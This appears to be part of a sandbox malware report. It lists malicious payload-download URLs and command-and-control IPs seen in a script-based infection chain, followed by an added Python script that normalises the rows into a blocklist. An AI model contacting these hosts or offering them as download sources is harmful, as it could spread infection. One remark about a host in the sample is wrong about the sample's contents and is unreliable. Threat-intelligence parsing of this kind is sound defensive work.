                http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 
00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmptrue
                • 16%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                https://104.168.155.143:8080/lregsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://159.89.202.34/regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://182.162.143.56/regsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/11regsvr32.exe, 00000004.00000002.632856837.0000000000F73000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://164.90.222.65/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/;regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/ | wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://169.89.202.34/ | regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://91.121.146.47:8080/ | regsvr32.exe, 00000004.00000002.632695477.0000000000EAD000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://187.172.199.165:8080/ | regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://163.44.196.120:8080/ | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Z= | regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://66.228.32.31:7080/Q | regsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://www.gomespontes.com.br/logs/pd/vM | wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ | regsvr32.exe, 00000004.00000002.632695477.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480984272.0000000000F00000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://www.gomespontes.com.br/logs/pd/0 | wscript.exe, 00000001.00000003.397549848.000000000514E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398347187.000000000515E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396362183.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397096568.0000000005128000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396772496.0000000005110000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397979888.0000000005155000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://160.16.142.56:8080/u | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://167.172.199.165:8080/ | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://159.89.202.34/q | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://66.228.32.31:7080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ | regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://ozmeydan.com/cekici/9/ | wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/X& | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://penshorn.org/ | wscript.exe, 00000001.00000003.400714303.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402484207.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404747809.0000000005290000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM | wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://www.gomespontes.com.br/logs/pd/ | wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://penshorn.org/admin/Ses8712iGR8du/tM | wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ | regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632757041.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0 | wscript.exe, 00000001.00000003.400124856.000000000122C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM | wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/ | wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://164.90.222.65:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/? | regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://187.63.160.88:80/ | regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://104.168.155.143:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://softwareulike.com/cWIYxWMPkK/yM | wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://163.44.196.120:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://penshorn.org/admin/Ses8712iGR8du/R | wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392115662.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391750338.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402096163.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404247402.0000000004DEB000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/0 | regsvr32.exe, 00000004.00000002.632695477.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllB | wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398560196.0000000004FEC000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://912.162.143.56/ | regsvr32.exe, 00000004.00000003.504424434.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://167.172.199.165:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ | regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532419572.000000000307F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://104.168.155.143:8080/(SI | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ozmeydan.com/cekici/9/xM | wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://penshorn.org/admin/Ses8712iGR8du/cw3 | wscript.exe, 00000001.00000003.398804343.0000000005194000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404417697.000000000519E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399230636.0000000005194000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399258764.0000000005196000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389687687.0000000005193000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6H | wscript.exe, 00000001.00000002.404406526.0000000005194000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/ | wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM | wscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/b | regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/D= | regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://160.16.142.56:8080/ | regsvr32.exe, 00000004.00000002.632757041.0000000000ED7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://penshorn.org:443/admin/Ses8712iGR8du/ | wscript.exe, 00000001.00000002.404454942.00000000051DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399363691.00000000051DC000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://164.90.222.65/0 | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://159.89.202.34/wn | regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://187.63.160.88:80/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/ | regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532419572.000000000307F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633026699.000000000306E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532419572.000000000306E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
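The URL table above is the raw material for a blocklist, but it needs cleaning before use: several entries carry carved-string residue after the real path (the "Q", "X&", "tM" fragments), one host (912.162.143.56) is not a valid IPv4 address, the same host appears with both Malicious values across rows, and ports are sometimes implicit. The following Python is an added example, not code from the Joe Sandbox report or from Joe Security: it takes rows in the flattened one-line form in which this table is commonly exported (URL, then the "process, memory dump" list, then the Malicious flag glued on the end), splits them into fields, validates the host, fills the default port for the scheme and groups the malicious endpoints by the process they were carved from. Everything in SAMPLE_ROWS is a constructed copy of rows from this report; the split into "stage-1 download locations" (wscript.exe memory) and "C2" (regsvr32.exe memory) is my interpretation of the report, not something it states.

```python
"""Normalise Joe Sandbox URL-table rows into stage-1 hosts and C2 endpoints.

Added example, not Joe Sandbox code. Rows are in the flattened form
"<url><process>, <memdump>, <process>, <memdump>, ...<true|false>".
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: copies of rows from this report in the flattened form.
SAMPLE_ROWS = [
    "https://66.228.32.31:7080/Qregsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue",
    "https://91.121.146.47:8080/regsvr32.exe, 00000004.00000002.632695477.0000000000EAD000.00000004.00000020.00020000.00000000.sdmptrue",
    "https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.632695477.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480984272.0000000000F00000.00000004.00000020.00020000.00000000.sdmptrue",
    "https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/X&regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue",
    "https://187.63.160.88:80/regsvr32.exe, 00000004.00000003.532536452.0000000000EDC000.00000004.00000020.00020000.00000000.sdmptrue",
    "https://160.16.142.56:8080/regsvr32.exe, 00000004.00000002.632757041.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://912.162.143.56/regsvr32.exe, 00000004.00000003.504424434.0000000000EDC000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://penshorn.org/admin/Ses8712iGR8du/tMwscript.exe, 00000001.00000003.400124856.0000000001231000.00000004.00000020.00020000.00000000.sdmptrue",
]

# The URL is everything before the first source-process name; the Malicious
# flag is the trailing true/false. Carved residue between the real path and
# the process name ("Q", "X&", "tM") stays on the path, which does not affect
# host and port extraction.
ROW_RE = re.compile(
    r"^(?P<url>\S+?)"
    r"(?P<source>(?:wscript|regsvr32)\.exe.*?)"
    r"(?P<malicious>true|false)$"
)
DEFAULT_PORTS = {"http": 80, "https": 443}
HOSTNAME_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.IGNORECASE)


def parse_row(row):
    """Split one flattened row into url, source processes, memdumps and flag."""
    m = ROW_RE.match(row.strip())
    if m is None:
        raise ValueError(f"unrecognised row: {row[:60]!r}")
    tokens = m.group("source").split(", ")
    return {
        "url": m.group("url"),
        "processes": sorted({t for t in tokens if t.endswith(".exe")}),
        "dumps": [t for t in tokens if t.endswith(".sdmp")],
        "malicious": m.group("malicious") == "true",
    }


def valid_host(host):
    """Reject carved garbage such as 912.162.143.56 (octet above 255)."""
    if re.fullmatch(r"[0-9.]+", host):
        try:
            ipaddress.ip_address(host)
            return True
        except ValueError:
            return False
    return HOSTNAME_RE.match(host) is not None


def endpoint(url):
    """Return (host, port) with the scheme default filled in, or None if the
    host is not a usable indicator."""
    parts = urlsplit(url)
    host = parts.hostname
    if host is None or not valid_host(host):
        return None
    return host, parts.port or DEFAULT_PORTS.get(parts.scheme)


def split_endpoints(rows):
    """Group the endpoints of rows flagged malicious by originating process.

    Assumption (my reading of the report, not its statement): URLs carved
    from wscript.exe are the stage-1 payload download locations used by the
    OneNote script; URLs carved from regsvr32.exe are the C2 list of the
    DLL it registered.
    """
    stage1, c2 = set(), set()
    for row in rows:
        rec = parse_row(row)
        if not rec["malicious"]:
            continue
        ep = endpoint(rec["url"])
        if ep is None:
            continue
        key = f"{ep[0]}:{ep[1]}"
        if "wscript.exe" in rec["processes"]:
            stage1.add(key)
        if "regsvr32.exe" in rec["processes"]:
            c2.add(key)
    return {"stage1": sorted(stage1), "c2": sorted(c2)}


if __name__ == "__main__":
    for kind, eps in split_endpoints(SAMPLE_ROWS).items():
        print(kind, *eps, sep="\n  ")
```

Note that the flag used here is the report's own Malicious column, not the Avira verdict, and that the same host can carry both values on different rows (160.16.142.56 is false on every row in this sample, 163.44.196.120 is true on one row and false on none). If you block per host rather than per URL, aggregate the flag across all rows for that host before deciding.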
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
